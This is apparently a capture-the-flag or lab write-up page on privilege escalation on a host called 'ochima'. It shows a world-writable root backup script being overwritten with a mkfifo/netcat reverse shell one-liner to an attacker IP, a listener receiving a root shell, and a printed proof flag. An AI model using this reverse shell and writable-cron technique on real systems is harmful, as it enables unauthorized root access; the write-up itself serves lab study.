Priv Esc

snort@ochima:~$ tar xzf etc_backup.tar

gzip: stdin: not in gzip format
tar: Child returned status 1
tar: Error is not recoverable: exiting now

Run pspy

snort@ochima:~$ ls -la /var/backups/
total 836
drwxr-xr-x  2 root root   4096 Oct 23 15:42 .
drwxr-xr-x 14 root root   4096 Dec 11  2023 ..
-rw-r--r--  1 root root  61440 Oct 23 14:57 alternatives.tar.0
-rw-r--r--  1 root root  40970 Dec 11  2023 apt.extended_states.0
-rw-r--r--  1 root root   4438 Dec 11  2023 apt.extended_states.1.gz
-rw-r--r--  1 root root   3940 Oct 31  2023 apt.extended_states.2.gz
-rw-r--r--  1 root root      0 Oct 23 14:57 dpkg.arch.0
-rw-r--r--  1 root root    268 Jun 15  2022 dpkg.diversions.0
-rw-r--r--  1 root root    172 Dec 11  2023 dpkg.statoverride.0
-rw-r--r--  1 root root 716144 Dec 11  2023 dpkg.status.0
-rwxrwxrwx  1 root root     54 Dec 11  2023 etc_Backup.sh

snort@ochima:~$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.178 8338 >/tmp/f" > /var/backups/etc_Backup.sh

❯ nc -lnvp 8338
listening on [any] 8338 ...
connect to [192.168.45.178] from (UNKNOWN) [192.168.181.32] 51450
sh: 0: can't access tty; job control turned off
# whoami
root
# cat /root/proof.txt && ip addr
a6adc37be925ccc4b3403d0f47a79879
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:bf:8f:20 brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    inet 192.168.181.32/24 brd 192.168.181.255 scope global ens160
       valid_lft forever preferred_lft forever

PreviousFoothold NextCredentials / Notes / LL

Last updated 4 months ago